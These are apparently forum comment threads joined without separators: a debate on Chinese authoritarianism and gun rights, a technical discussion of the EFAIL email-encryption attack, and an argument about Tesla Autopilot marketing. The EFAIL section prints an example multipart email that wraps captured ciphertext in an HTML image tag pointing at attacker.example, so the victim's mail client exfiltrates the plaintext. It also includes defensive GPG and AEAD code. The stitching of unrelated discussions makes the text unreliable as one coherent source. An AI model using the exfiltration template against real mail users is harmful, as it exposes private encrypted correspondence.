There really isn't one when most of the Uighur population is impoverished, if not otherwise disaffected, and the local Han population is effectively incentivised to leave Xinjiang for better prospects elsewhere. Between 2010 and 2013, the number of Han Chinese living in Xinjiang fell by 400,000 through a combination of natural population decline and emigration[0]; this represents a solid 2% of the total population, and there is no evidence to suggest the trend is slowing down.
Heavy policing may put a lid on the problem for now but in the long run it will only undo several generations of hard work pacifying the region.
I see what you are saying. I think there are ways to do it. The Soviets were successful in their central Asian and Caucasus "Republics". They tended to coopt a local leader and got them to do their bidding. Even Russia now with Chechnya has been able to use the same formula. It's not impossible for the CCP to do the same.
One could argue that “totalitarianism” was the default government form for most of history.
The problem is, the higher we go on the Maslow pyramid, the more likely it is for it to fail. You just can’t have a huge mass of creative, inventive people without them complaining about leadership (and wanting to improve it).
And totalitarianism by definition has problems accepting criticism.
The only way for totalitarianism to “work” is if the rulers are both much smarter than the population as a whole and also benevolent.
Regarding China, let's see. These kinds of regimes don't fail immediately; the cracks just get bigger and bigger. From what I hear there's a consolidation of power going on, and that's generally a sure sign of the first cracks appearing.
>The only way for totalitarianism to “work” is if the rulers are both much smarter than the population as a whole and also benevolent.
I don't think that's realistic anymore. Once they are able to hit first and hit hard when opposition forms, they are pretty much untouchable.
The whole argument that autocratic regimes have a higher chance of collapsing the longer they reign looks like a naive, outdated approach to me.
It bets on a critical mass of opposition forming. With total surveillance this won't happen.
A successful mass protest has to start somewhere. If you arrest those first people willing to risk everything, you quell the entire thing. It's the basic concept of 1984. The only thing holding back this dystopia was the lack of a big brother state with sufficient insight.
The mass surveillance back then was child's play compared to what is possible today. There is a tipping point, hopefully still in the future, where dissent is detectable and predictable enough that regimes are no longer at risk of collapse.
If you look at collapses of authoritarian regimes due to public pressure, they follow a similar pattern. A small group of people starts a protest, and depending on how hated the regime is and how bad the living conditions for most people are, others will join in; the more who join, the less likely it becomes that any individual will be picked out.
This only works if the initial small group has enough time to motivate enough people to join in so that it snowballs. The earlier approach was to minimize the time the small groups had to snowball, with quick and hard actions, but with more and more surveillance it becomes possible to target people even before they join. At a certain point it becomes possible to watch over every last citizen and target anyone who might be willing to start something like this in the future.
The number of protests in China has been exploding over the past decade(s). I didn't even know until someone mentioned it on here a few months back, but IIRC it's gone from maybe a few thousand per year in the 90s to well over 100,000 in recent years.
The Chinese rich I've interacted with are also (in my experience, at least - I don't have stats to support this) really ignorant of how bad a lot of their countrymen have it. A friend of mine's father is some sort of government official in a tier 1 or 2 city, and he's told me that the rich and poor are segregated enough that he himself didn't even realize his family was anything other than middle class until he came to Canada and saw it wasn't exactly normal to have parents who can afford 100k+ annual tuition, luxury cars and apartments, etc.
> You just can’t have a huge mass of creative, inventive people without them complaining about leadership (and wanting to improve it).
You create an upper middle class for the "creatives" and you restrict the areas of creativity to military and industrial use.
Most well-off people that I know are happy to think the poor deserve to be poor and repressed (different people have different reasons for justifying it; few seem to really care).
Nothing is forever. The current regime in China won't be forever either. The question is how long.
After Augustus Rome still had a couple of hundred years of expansion where a nationalist could argue, “hey look at that! Things are still going good.” But they couldn’t outrun the rot in the system forever.
After Xi, will China get another strongman? I think this is the key. If there is a series of total dictators, things will decay. Whatever justifications a dictator uses for their rule, ultimately they are going to try to implement policies that keep themselves on top first.
This is a great point. Xi is a strongman dictator and has arguably harmed Communist rule a lot more than he realizes by eliminating term limits. If the next ruler is some fool who cannot handle the crises that a country inevitably faces... it could lead to the country's undoing.
Which is why I am personally a lot more alarmed at the current US Presidency than most of my peers. Inept rulers have historically been the best predictors of a civilization's downfall. The fervent opposition to the administration by ordinary US citizens gives me hope but if Republicans continue to hold on to power after November, I really do feel that all will be lost.
That didn’t work for the USSR, why would it work for China? As long as some things are off limits, and as long as people know they aren't allowed to research this or that, they'll be at a long-term disadvantage to those who do.
China was here before. Cutting yourself off from the world just means you eventually find yourself having fallen behind everyone else.
> That didn’t work for the USSR, why would it work for China?
The CCP does have the benefit of learning from the failures of the Soviets.
> China was here before. Cutting yourself off from the world just means you eventually find yourself having fallen behind everyone else.
That mainly happened because they were so dominant in their sphere that they didn't bother themselves with far off areas that seemed primitive to them. I'm pretty sure the CCP has learned from that mistake.
> If they had learned from that mistake they wouldn’t be trying to wall the internet off.
They're walling off foreign political ideas and avenues for domestic political organization, not foreign technological advancements. They are very explicit about that.
Do we actually need creative inventive people? Maybe at some point we run low on truly innovative new ideas that are truly practical. Maybe we just start re-skinning the old ideas and selling them for no real benefit, and could do without the whole process. Maybe that's already in the process of happening.
It's one thing to invoke Abraham Maslow for aesthetic purposes during flowery discussion, but Maslow isn't followed much or at all by current researchers.
I can’t say I follow modern economics too closely, but does anyone really dispute that the need for food is a lower level one than the need for academic achievements, for example?
You've hit the nail on the head. But I think there are two separate issues at play here. The first is the re-writing of the social contract that can only be done by implementing mass surveillance. This approach is arguably justifiable and gives the government more control to optimize how things work. The second is having a one-party government where there is no opposition. To me this approach is definitely dangerous long term. Complete tyranny is fantastic when you have a great dictator, but there's just no evidence that this model is sustainable. If China gets too crazy, the best and brightest will want to leave the country. It's a crazy and bold experiment, and it's definitely working in the short term.
Successful "tyranny" could be analogous to successful multicellular life. We could be witnessing a similar development in the history of life. But note that multicellular life never wiped out single cells, and in fact we live symbiotically with a large number. Plus, cancer is apparently not something that can be eliminated.
There are good reasons to believe China's situation is in fact quite unique among totalitarian concepts and very difficult to replicate. China's situation represents a very complex, multi-generational cultural-political totalitarianism, and it required a unique context economically for it to occur. I've never seen another nation come even remotely close to replicating what it takes to set that up.
Take Turkey for example, under Erdoğan. Let's say he is, or wants to be, a traditional dictator. He's probably gone in 10 or 20 years due to age. His regime ends with him, very likely, because there's no broad cultural underpinning to his regime and legacy. That's the case in most totalitarian examples of the last century.
The cultural reformations that enabled the China boom, starting with Deng Xiaoping, are being systematically rolled backwards.
The economic gains from the late 1970s to ~2009 were very easy compared to the challenges that come next in pushing the per capita results ever higher. When you're starting from $175 GDP per capita in 1980, just about any meaningful improvement in the system will get you to $1,000 or $2,000 per capita.
My point being, only when the tide goes out do you see who is swimming naked, to borrow a line from Warren Buffett. China's vast growth no doubt masks immense problems that only become clearer in their scope and risk as their 30 year economic expansion matures (as it is now).
The people of China will tolerate a lot of things if you take them from $200 GDP per capita to $10,000. China is not going to be able to replicate that climb again, from here forward. That will have consequences, as the social contract in China requires perpetual, preferably rapid, improvement.
What China has done is extraordinarily expensive. They paid for it with a unique, historically singular export machine and trade surplus and starting from a context of a near zero welfare state (diverts capital from investment & growth) and from a setup with nearly maximum economic slack (easy to fill in for decades).
What other nations have anything like that setup to replicate from? Russia (fascist dictatorship, long totalitarian history) for example doesn't have that sort of extreme economic slack, its GDP per capita is already up where China is at today; the same goes for Turkey. The Russian system is mature, slow growth, with considerable existing structural financial demands that prevent the vast free use of capital as in China.
China's rules today are not the same as China's rules in 1996 or 2006. Culturally they've lost a lot of the modest freedom gains that were acquired over decades, in just the last five or six years. How does that impact the ability of their economic system to continue to scale over time, as the oppression ramps up?
These are two different systems - Deng vs Xi - not a continuation of the same system. Xi gets to ride on the accomplishments of the Deng revolution, including the financial capabilities it made possible. I think it's a fair question whether China can keep moving forward as before while simultaneously removing the Deng approach that made it all possible in the first place.
Don't ignore the different philosophical foundation of Asian societies. Confucianism is quite different from the Western line of tradition starting from the Greeks. Confucianism emphasizes community and obedience more, which is more compatible with mass surveillance.
What Xi is doing is not Confucianism. Confucianism had an elaborate set of rules that everyone, from the top down, was required to follow. Xi is basically making up the rules as he goes along.
> In the West we have a false sense of security that totalitarianism will inevitably fail.
The West has had, for the last 200 years (and arguably for the last 500) the advantage that its economic system is better than its rivals. This is a massive, game-changing advantage. But it's not obvious to me that the West is still ahead economically -- look at China's growth rates over the last 40 years. Admittedly they are coming from behind, but because of their population they only need 1/4 of the GDP per head of the USA to be ahead on total GDP.
I would say there's about a 50% possibility that China will make an authoritarianism that works, that's at least as successful economically as the West. And if that comes about it will be a real game-changer. And frankly, I don't think the West is up to the task of meeting the challenge; certainly I would not bet on Trump, Merkel, May et al doing the right thing.
The Marxist/Maoist idea of the Chinese would be that the government is just part of the superstructure on top of the base. The base being the current state of the forces of production in their continual self-evolution and reinvention, and the relations of production flowing from that.
In other words, the economic system determines the political system. When hunter-gatherers became farmers, the political system changed. When farming as the center made way for manufacturing and industry, the political system changed (as did culture).
I don't see this as much different than Americans driving Lakota onto the Standing Rock Indian Reservation. Just two years ago the US federal government arrested and injured many on that reservation. Or Americans driving Vietnamese onto strategic hamlets. Or locking Japanese up in the 1940s. I don't see what innovation the Chinese have made.
You're never allowed to mention anything bad that's ever happened in the West, that's whataboutism. Randomly bringing up extremist scenarios like Mao's genocide of landlords or Stalin's gulags to prematurely shut down moderate pro-left discussions like "let's make healthcare a little more socialized in the US"? That's not whataboutism™.
Very well put and also very true. Most people are absolutely unaware of how fast big shifts happen. National socialism was invented with the founding of the NSDAP in 1920. Less than two decades later, a heavily armed and aggressive Germany invaded Poland in 1939. Nineteen years from zero to war.
Considering how much more technology has evolved since then, it isn't far-fetched to think that this pace of devolution into totalitarianism could happen much faster today.
In fact, this is precisely what happened with ISIS. I shudder to think what might have happened if the powers that be had not put aside their differences to fight a common foe.
> Seems many Americans are willing to crap all over the 2nd Amendment, which is specifically in place to prevent totalitarian government.
The 2nd Amendment specifies that a well regulated militia is necessary for a free state, and that the right to keep and bear arms cannot be abridged by the Federal government.
Nothing in that amendment specifically mentions the purpose of preventing totalitarian government. That's a modern interpretation, albeit one currently upheld by the Supreme Court.
> Nothing in that amendment specifically mentions the purpose of preventing totalitarian government.
You have to take into account the context. It was written and ratified by people who'd just staged a revolution against what they described as a "tyrannical" regime, often using their own personal weapons.
To note that the Constitution doesn't mention "totalitarianism" is to note that it doesn't contain an anachronism. It's a modern coinage that's not too far in meaning from "tyranny."
If you genuinely believe this argument, wouldn't the logical corollary be to starve the government of manpower and weapons? Instead, most who espouse the '2nd Amendment is needed against tyranny' position are often voting for massive increases to defense and policing budgets. Not picking a fight; it just seems ineffective and incongruous to think that holding on to an AR-15 in your home will help you against billion-dollar integrated policing and surveillance systems...
> Seems many Americans are willing to crap all over the 2nd Amendment, which is specifically in place to prevent totalitarian government.
Exactly. If America has learned anything from the past half century of foreign military adventures, it should be that a big modern army can't easily defeat a motivated insurgency that has support and sympathy among the local population.
The 2nd Amendment may have a lot of costs, but the private gun ownership it provides for would definitely make it much more difficult for a domestic totalitarian regime to establish itself in the US.
Successful insurgencies these days are supplied with heavy weapons and training by outside powers. You’re not going to do anything against armour and air power with small arms.
> Successful insurgencies these days are supplied with heavy weapons and training by outside powers. You’re not going to do anything against armour and air power with small arms.
An insurgency has a lot of freedom in choosing its targets. If they don't have the weapons to directly attack armor or air power, they can avoid them. And with armor, there are other options, such as IEDs.
Also, I'd bet that an American insurgency against a totalitarian American government would get outside arms and support, as well as sympathy, support, and defections from actual US Army units. I don't think the US military would be able to maintain the same level of cohesion it has during foreign wars in a civil war.
A totalitarian regime would probably repeal the 2nd Amendment as one of its first acts, but the existing stock of small arms and ammunition would be enough for an insurgency or rebellion to start. It'd be much harder for a disarmed population to begin resistance.
I think that's a pipe dream. If it were a right-wing totalitarian government, which is imho the likely lean of any totalitarian government in the US, there would be little defection or protest from folks in uniform.
Think about any standoff between protesters and police or national guard in the US. Lefty students or unionists or whatever get shot or pepper-sprayed by cops or national guardsmen with a family to feed and a career defined by obeying the rules - that equation will not change with scale.
I wonder if the winning side of a US military civil war would capture territory "nation building" style or if they would just use asymmetric reprisals. If it's the latter, civilian gun ownership is just going to get neighbors of insurgents blown up.
I'm also pretty sure that Iraqi civilians didn't have much access to small arms prior to the destabilization of the country. Didn't slow down the insurgency any.
Yup: Trump, Afghanistan, Iraq, Syria, the 2008 meltdown, Zuckerberg turning the internet into his private sewage factory, etc. etc. are all shining achievements of Western wisdom and deep thought. The poor unimaginative illiterates of the Orient just don't get it. If only they understood what magic freedom can produce.
Btw, I suggest you reread your French Revolution history. The aristocracy was very much back in power within a year of the king getting his head chopped off. And then they propped up Napoleon, who decided he needed to conquer the world. The next 100 years were spent with the elites of one European country or another colonising and pillaging most of South America, Africa and Asia. So much for freedom and equality and the aristocracy learning any lesson. They are still more or less in power with the same mindless global ambitions, unless you haven't seen the inequality numbers and have your head buried deep in the sand.
Within a few decades of the French Revolution, half of the European governments were overthrown and replaced with constitutional monarchies. The other half that resisted were forced into increasing totalitarianism and, in a few more decades, were themselves overthrown in year-zero revolutions.
The one country to avoid this, Britain, learned the lesson of the French Revolution. They made enough reforms that there was no constituency for revolution.
> The one country to avoid this, Britain, learned the lesson of the French Revolution. They made enough reforms that there was no constituency for revolution.
Er, Britain had been a constitutional monarchy for a long time before the French Revolution, and many of the others made reforms rather than being overthrown, and in many cases, like Britain, well before the French Revolution.
Both of you are somewhat right. The various events of the late seventeenth century helped prevent revolution from popping up in Britain around the French Revolution, but its political system at the time still shut most of the country out of politics. This was a widespread issue in Europe, and the Revolutions of 1848 were largely about it. Britain addressed it with the Reform Acts, allowing its government to stay stable through the period.
> In the West we have a false sense of security that totalitarianism will inevitably fail.
At the height of the civil war, the Western classical liberal democracies looked weak and near collapse while the Soviet Union looked too strong and awesome, until one day it just collapsed. It is a bubble boy vs. sewer rat thing. The bubble boy looks extremely clean and insulated from bad things until one day he just dies of a common cold. The filthy NY sewer rat, however, survives while carrying ten different types of plague.
> China seems committed to making totalitarianism "work."
We need to take a step back and realise that American media simply does not get China, India or Japan. They are judging the world through their own spectacles, which might be wrong. An average Chinese person today is freer than an average Chinese person 30 years ago, despite all efforts by their government. An average American today is less free than an average American 30 years ago.
I am incredibly hopeful for India and China in their upcoming efforts. I recently spoke to a Chinese attaché at a local embassy. He was ecstatic to be outside China because he could now access Youtube and Facebook. He considered his own government's moves to ban these services in his country absolutely stupid, and saw them as a hindrance to China emerging as a soft power.
> At the height of the civil war, the Western classical liberal democracies looked weak and near collapse while the Soviet Union looked too strong and awesome, until one day it just collapsed.
FYI, the American Civil War ended in 1865, while the first soviet was formed in 1905. And the first ~10 years after the '17 revolution were absolutely terrible in the Soviet Union. So your statement just isn't correct.
Abstract: S/MIME and MUAs are broken. OpenPGP (with MDC) is not, but clients MUST check for GPG error codes. Use Mutt carefully or copy/paste into GPG for now.
- Some mail clients concatenate all parts of a multipart message together, even joining partial HTML elements, allowing the decrypted plaintext of an OpenPGP or S/MIME encrypted part to be exfiltrated via an image tag. Mail clients shouldn't be doing this in any world, and can fix this straightforwardly.
- S/MIME (RFC 5751) does not provide for authenticated encryption, so the ciphertext is trivially malleable. An attacker can use a CBC gadget to add the image tag into the ciphertext itself. We can't expect a mail client to avoid exfiltrating the plaintext in this case. S/MIME itself needs to be fixed (or abandoned).
- OpenPGP (RFC 4880) provides for authenticated encryption (called "MDC"; see sections 5.13 and 13.11 of the RFC) which would prevent a similar CFB-based gadget attack if enforced. GPG added this feature in 2000 or 2001. If the MDC tag is missing or invalid, GPG returns an error. If GPG is asked to write the plaintext to a file, it will refuse. When the output is directed to a pipe, it will write the output and return an error code [1]. An application such as an MUA using it in this manner must check for the error code before rendering or processing the result (see the sketch after this list). It seems this requirement was not made clear enough to implementors. The mail clients need to release patches to check for this error. This will create an incompatibility with broken OpenPGP implementations that have not yet implemented MDC.
- Even without clients enforcing or checking the authentication tag, it's a bit trickier to pull off the attack against OpenPGP because the plaintext may be compressed before encryption. The authors were still able to pull it off a reasonable percentage of the time. Section 14 of RFC 4880 actually describes a much earlier attack which was complicated in this same manner; it caused the OpenPGP authors to declare decompression errors as security errors.
Net-net, using encrypted email with Mutt is safe [2, Table 4], though even there, opening HTML parts encrypted with S/MIME in a browser is not, and double-checking how it handles GPG errors would be prudent before forking a browser on any OpenPGP encrypted parts. See the paper for other unaffected clients, including Claws (as noted below) and K-9 Mail (which does not support S/MIME). Otherwise, it's probably best to copy and paste into GPG (check the error code or ask it to write to a file) until this is worked out.
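To make "check for the error code" concrete, here is a minimal sketch of how an MUA might wrap GPG. The function name and error handling are illustrative assumptions, not any real client's code; the one load-bearing fact, per the thread, is that piped GPG output is untrustworthy until the exit status has been checked:

    import subprocess

    def decrypt_for_rendering(ciphertext: bytes) -> bytes:
        """Decrypt an OpenPGP part; never hand back unauthenticated output."""
        proc = subprocess.run(
            ["gpg", "--batch", "--decrypt"],
            input=ciphertext,
            capture_output=True,
        )
        # With piped output, GPG emits the plaintext even when the MDC is
        # missing or invalid, and signals failure only via its exit status,
        # so the caller must check it before touching proc.stdout.
        if proc.returncode != 0:
            raise RuntimeError("GPG reported an error; discarding plaintext")
        return proc.stdout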
“If GPG is asked to write the plaintext as a file, it will refuse. When the output is directed to a pipe, it will write the output and return an error code”
I honestly don’t care about the rationale, but this inconsistent behaviour is simply wrong. After 18 years of discussion, end this. Whenever DECRYPTION_FAIL occurs, there MUST be no decrypted content.
That's not really compatible with piped output. The encrypted message can't be authenticated until it has been completely processed, but the whole point of piping is to output bytes as soon as they're available.
Perhaps the moral of this story is to disable GPG's pipe feature? But it's a legitimate and significant performance improvement for authentic messages. You "just" have to remember to check the error code and it's fine/safe.
Perhaps that's just too much to ask. Maybe we just can't have fast streaming decryption because it's too hard for client developers to use safely. But that point of view is at least not obvious.
(On the other hand, what were you planning to do with the piped output in the first place? Probably render it, right? If GPG clients stream unauthenticated bytes into a high-performance HTML renderer, the result will surely be efail.)
That is not the whole point of piping, and the default behavior of GPG should be to buffer, validate the MDC, and release plaintext only after it's been authenticated. Pipes are a standardized Unix interface between processes, not a solemn pledge to deliver bytes as quickly as possible.
If pipes had the connotation you claim they do, it would never be safe to pipe ciphertext, because the whole goal of modern AEAD cryptography is never to release unauthenticated plaintext to callers.
Clients encrypting whole ISO images should expect that decryption will require a non-default flag. Ideally, GPG would do two-pass decryption, first checking the MDC and then decrypting. Either way, the vast, commanding majority of all messages GPG ever processes --- in fact, that the PGP protocol processes --- should be buffered and checked.
If you have a complaint about how unwieldy this process is, your complaint is with the PGP protocol. The researchers, and cryptographers in general, agree with you.
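For contrast, here is the contract a modern AEAD API enforces by construction: a minimal sketch using the Python `cryptography` package's AES-GCM (chosen purely for illustration; OpenPGP's MDC is an older, weaker construction):

    import os
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    key = AESGCM.generate_key(bit_length=256)
    nonce = os.urandom(12)  # must be unique per message under a given key
    aead = AESGCM(key)

    ciphertext = aead.encrypt(nonce, b"the whole message, buffered", None)

    # decrypt() authenticates the entire ciphertext before returning a single
    # byte; on tampering it raises InvalidTag and the caller sees nothing.
    plaintext = aead.decrypt(nonce, ciphertext, None)

The whole message is buffered and checked as a unit, which is exactly the behavior being argued for above.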
Is it so easy for GPG to buffer the cleartext while validating the MDC? As the cleartext may not fit in RAM, this means that GPG could need to write it to a temporary file, right? But then, if decryption is aborted messily (e.g., the machine loses power), then this means that GPG would be leaving a file with part of the cleartext behind, which has obvious security implications.
You could also imagine a two-pass approach where you first verify and then decrypt, but then what about a race condition (TOCTOU) where another process modifies the encrypted file between the two passes?
Again, the cleartext virtually always fits trivially in RAM, and when it doesn't, it can error out and require a flag to process. Yes, this is easy to fix.
OpenPGP needs to change as well, but that doesn't make insecure behavior acceptable in the interim, no matter what Werner Koch thinks.
What is the point of piping, in your view? My understanding is that it's a stream of bytes with backpressure, designed specifically to minimize buffering (by pausing output when downstream receivers are full/busy).
> If pipes had the connotation you claim they do, it would never be safe to pipe ciphertext, because the whole goal of modern AEAD cryptography is never to release unauthenticated plaintext to callers.
You say that like it's a reductio ad absurdum, but I think that's essentially right; you can't do backpressure with unauthenticated ciphertext. You have to buffer the entire output to be sure that it's safe for further processing.
Thus, if you want to buffer the entire output, don't use a pipe; ask the tool to generate a file, and then read the file only when the process says that the file is done and correct.
(I'd say that's a lot more wieldy than two-pass decryption.)
Based on your other remarks about PGP ("nuke it from orbit"), I'm not sure you have any constructive remarks to make on how to improve GPG, but I guess making it two-pass by default (with a --dangerous-single-pass flag) would be an improvement.
For normal size emails, users probably wouldn't notice the performance cost of the second pass, and clients who care about performance at that level can opt into single-pass decryption and just promise to check the error code.
Backpressure is a feature of Unix pipes. It isn't their raison d'être.
I don't care how you implement it, but any claim that you can't check the MDC in GPG because it's a piped interface is obviously false. GPG can, like any number of Unix utilities, some casually written and some carefully written, simply buffer the data, process it, and write it.
Nobody said "you can't check the MDC." Everybody said "you have to check GPG's error code."
And I think it's clear to everybody (in this thread) that GPG's approach is a dangerous blame-the-user approach to API design, even granting that this dangerous approach offers optimum performance (especially relative to adding an entire second pass).
You are getting your concepts confused. Pipes are one thing, but the concept at hand is in fact filters, programs that primarily read data from their standard inputs and write other (processed) data to their standard outputs. What pipes involve is a red herring, because filters do not necessitate pipes. Filters have no requirements that they write output whilst there is still input to be read, and several well-known filter programs indeed do not do that.
This is why I initially hesitated to implement a streaming interface for my crypto library¹ (authenticated encryption and signatures). I eventually did it, but felt compelled to sprinkle the manual with warnings about how streaming interfaces encourage the processing of unauthenticated messages.
Now that we have a vulnerability with a name, I think I can make those warnings even scarier. I'll update that manual.
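For the curious, the usual way to make a streaming interface safer (a sketch of the general chunking idea under my own assumptions, not of any particular library's construction) is to authenticate each chunk independently and bind its index into the nonce, so nothing unauthenticated is ever released and chunks can't be reordered:

    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    CHUNK = 64 * 1024  # upper bound on data held in memory before release

    def encrypt_chunks(key: bytes, chunks):
        aead = AESGCM(key)
        for i, chunk in enumerate(chunks):
            nonce = i.to_bytes(12, "big")  # chunk index as nonce: key must be single-use
            yield aead.encrypt(nonce, chunk, None)

    def decrypt_chunks(key: bytes, ciphertexts):
        aead = AESGCM(key)
        for i, ct in enumerate(ciphertexts):
            nonce = i.to_bytes(12, "big")
            # Each chunk is verified before it is yielded; a tampered or
            # reordered chunk raises InvalidTag. (A complete design also
            # marks the final chunk so truncation is detected.)
            yield aead.decrypt(nonce, ct, None)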
> Use Mutt carefully or copy/paste into GPG for now.
According to [1], Claws Mail is also unaffected. I don't know if it was tested with or without its HTML plugin, but this should make no difference as long as the plugin is not configured to access remote resources. (By default it cannot make network requests.)
OK, so Thunderbird plus Enigmail is probably the most popular setup on Linux. And according to Robert J. Hansen:[0]
> By default, GnuPG will scream bloody murder if a message lacks an MDC or if the MDC is invalid. At that point it's up to your email client to pay attention to the warning and do the right thing. Enigmail 2.0 and later are fine, but I can't speak for other systems.
So if you use Enigmail, make sure that you're not still on v1.99. Just update the add-on in Thunderbird.
Also, of course, make sure that external resources aren't being fetched.
Edit: Oh, but damn. There's more in that thread. Enigmail >v2 can be forced to decrypt with MDC missing.[1] And this is a gpg bug:[2]
> ... and Patrick, moving faster than the speed of light, already has the bug triaged and bounced back. This is actually a GnuPG bug, not an Enigmail bug. ...
However:[3]
> It's worth noting, incidentally, the #Efail attack flat-out requires MIME. So inline PGP messages are not vulnerable, as there's no MIME parsing pass which can be exploited. So you're still safe, although this is still a bug that should be fixed. ;)
I also saw something about it requiring HTML decoding, but can't find it again :(
More: Yes, disable HTML rendering. In Thunderbird, select "/ View / Message Body As / Plain Text".
And:[4]
> The EFAIL attacks break PGP and S/MIME email encryption by coercing clients into sending the full plaintext of the emails to the attacker. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
So basically, 1) the attacker embeds a link to the encrypted message, 2) the email client fetches and decrypts it, and then 3) sends plaintext back to the attacker.
> So basically, 1) the attacker embeds a link to the encrypted message, 2) the email client fetches and decrypts it, and then 3) sends plaintext back to the attacker.
What? The attacker embeds the encrypted content inside a link, not a link to the content. The ciphertext could come from files stored in a public place, or from captured emails.
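Schematically, the "direct exfiltration" variant looks roughly like this (boundary and hostname invented for illustration): the attacker mails the victim a multipart message that sandwiches the previously captured ciphertext between two HTML fragments:

    Content-Type: multipart/mixed; boundary="BOUND"

    --BOUND
    Content-Type: text/html

    <img src="http://attacker.example/
    --BOUND
    Content-Type: application/pkcs7-mime; smime-type=enveloped-data

    [previously captured ciphertext]
    --BOUND
    Content-Type: text/html

    ">
    --BOUND--

A client that decrypts the middle part and naively stitches all three into one HTML document turns the plaintext into the tail of the image URL, and its own renderer dutifully sends it to attacker.example.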
Check RFC2634 before you abandon S/MIME. Triple wrapping solves surreptitious forwarding, which is how this attack works. Sadly AFAIK it's implemented only in Trustedbird.
Tesla probably shouldn't be saying anything about this at all, even just to avoid giving it more news cycles. But if they were going to say something, here's what they should have said the first time.
----
We take great care in building our cars to save lives. Forty thousand Americans die on the roads each year. That's a statistic. But even a single death of a Tesla driver or passenger is a tragedy. This has affected everyone on our team deeply, and our hearts go out to the family and friends of Walter Huang.
We've recovered data that indicates Autopilot was engaged at the time of the accident. The vehicle drove straight into the barrier. In the five seconds leading up to the crash, neither Autopilot nor the driver took any evasive action.
Our engineers are investigating why the car failed to detect or avoid the obstacle. Any lessons we can take from this tragedy will be deployed across our entire fleet of vehicles. Saving other lives is the best we can hope to take away from an event like this.
In that same spirit, we would like to remind all Tesla drivers that Autopilot is not a fully-autonomous driving system. It's a tool to help attentive drivers avoid accidents that might have otherwise occurred. Just as with autopilots in aviation, while the tool does reduce workload, it's critical to always stay attentive. The car cannot drive itself. It can help, but you have to do your job.
We do realize, however, that a system like Autopilot can lure people into a false sense of security. That's one reason we are hard at work on the problem of fully autonomous driving. It will take a few years, but we look forward to some day making accidents like this a part of history.
> It's a tool to help attentive drivers avoid accidents that might have otherwise occurred.
This needs far more discussion. I just don't buy it. I don't believe that you can have a car engaged in auto-drive mode and remain attentive. I think our psychology won't allow it. When driving, I find that I must be engaged, and on long trips I don't even enable cruise control, because taking the accelerator input away from me is enough to cause my mind to wander. If I'm not in control of the accelerator and steering while simultaneously focused on threats (including friendly officers attempting to remind me of the speed limit), I space out fairly quickly. From observing how others drive, I don't think I'm alone. It's part of our nature. So then, how can you have a car driving for you while simultaneously staying attentive? I believe the two are so mutually exclusive as to make it ridiculous to claim such a thing is possible.
I don't buy this either, and nor should we; it's not how the feature is marketed.
"The system is designed to be able to conduct short and long distance trips with no action required by the person in the driver’s seat."
The result of this statement, and of functionality that matches it, is a reinforced false sense of security.
Does it matter whether the driver of the Model X whose Autopilot drove straight into a center divider had his hands on the wheel, if the outcome of engaging Autopilot is that drivers focus less on the road? What is the point of two drivers, one machine and one human? You cannot compare a car's autopilot to an airplane's; they're not even in the same league. How often does a center divider just pop up at 20,000 ft?
Usually machinery either augments human capabilities by enhancing them, or entirely replaces them. This union, with both driver and car piloting the vehicle, has no point, especially when it's imperfect.
I'm not opposed to Tesla's sale of such functionality, sell whatever you want, but I am opposed to the marketing material selling this in a way that contradicts the legal language required to protect Tesla...
There are risks in everything you do, but don't market a car as having the hardware to do 2x your customers' driving capability and then have your legal material say: btw, don't take your hands off the steering wheel... especially when there's a several-minute video showing exactly that.
Tesla customers must have the ability to make informed choices in the risks they take.
Which is, by the way, part of why I love the marketing for Mobileye (at least in Israel, haven't seen e.g. American ads). It's marketed not as driving the car, but as stepping in when the human misses something. Including one adorable TV spot starring an argumentative couple who used to argue about who's a better driver, and now uses the frequency of Mobileye interventions as a scoring system. Kind of like autonomous car disengagement numbers :-P
There is a solution for this - if the driver shows any type of pattern of not using the feature safely, disable the feature. Autopilot and comparable functionality from other vehicles should be considered privileges that can be revoked.
Systems that are semi-autonomous, where there's some expectation of intervention, work well in those scenarios: keep the car in the lane markers on the highway, etc. Make sure the user's hands are on the wheel. But for fully autonomous systems, even if your hands are on the wheel, how does the car know you're paying attention?
This is exactly what the Tesla does. It periodically "checks" that you are there by prompting you to hold the steering wheel (requiring a firm grip, not just hands on the wheel). If you don't, the car slows to a stop and disables autopilot for the remainder of the drive.
> I'm not opposed to Tesla's sale of such functionality, sell whatever you want, but I am opposed to the marketing material selling this in a way that contradicts the legal language required to protect Tesla...
First let me state that I agree with this 110%!
I'm not sure if this is what you are getting at, but I'm seeing a difference between the engineers' exact definition of what the system is and does (and how it can be marketed to convey that most accurately), and the marketing team saying whatever they can, within their legal limits (I imagine), to attract potential customers to this state-of-the-art system within an already state-of-the-art automobile.
If we are both taking these two statements verbatim, then which one wins out:
> Autopilot is not a fully-autonomous driving system. It's a tool to help attentive drivers avoid accidents that might have otherwise occurred. Just as with autopilots in aviation, while the tool does reduce workload, it's critical to always stay attentive. The car cannot drive itself. It can help, but you have to do your job.
and
> The system is designed to be able to conduct short and long distance trips with no action required by the person in the driver’s seat.
If that's the crux of the issue that goes to court, then who wins? The engineering, legal, or marketing department? Or do they all lose, because the continuous system warnings that Autopilot requires attentive driving were ignored, and a person who already knew and complained of the limits of that system decided to forgo all qualms about it and fully trust it this time around?
I feel like when I was first reading and discussing this topic I was way more in tune with the human aspect of the situation and story. I still feel a little peeved at myself for starting to evolve the way I'm thinking about this ordeal in a less human and more practical way.
If we allow innovation to be extinguished for reasons such as these, will we ever see major growth in new technology sectors? That might be a little overblown, but does the fact that Tesla's additions to safety and standards have produced a markedly lower accident and death rate mean nothing in context?
If Tesla is doing a generally good job, bringing up the averages on all sorts of safety standards while sprinting headlong towards even more marked improvements, are we suddenly supposed to forget everything we know about automobiles and auto accidents/deaths when examining individual cases?
Each human life is important. This man's death was not needed, and I'm sure nobody at Tesla, or anywhere for that matter, is anything besides torn up about having some hand in it. While profit is definitely a motive, Tesla knows that the means to the profit it seeks is a superior product, and that includes superior features and superior safety standards. If Tesla is meeting and beating most of those goals and we have a situation such as this, why do I feel (and I could be way wrong here) that Tesla is being examined as if it were an auto manufacturer with a history of lemons, deadly rollover accidents, persistent problems, irate customers, or anything of the like?
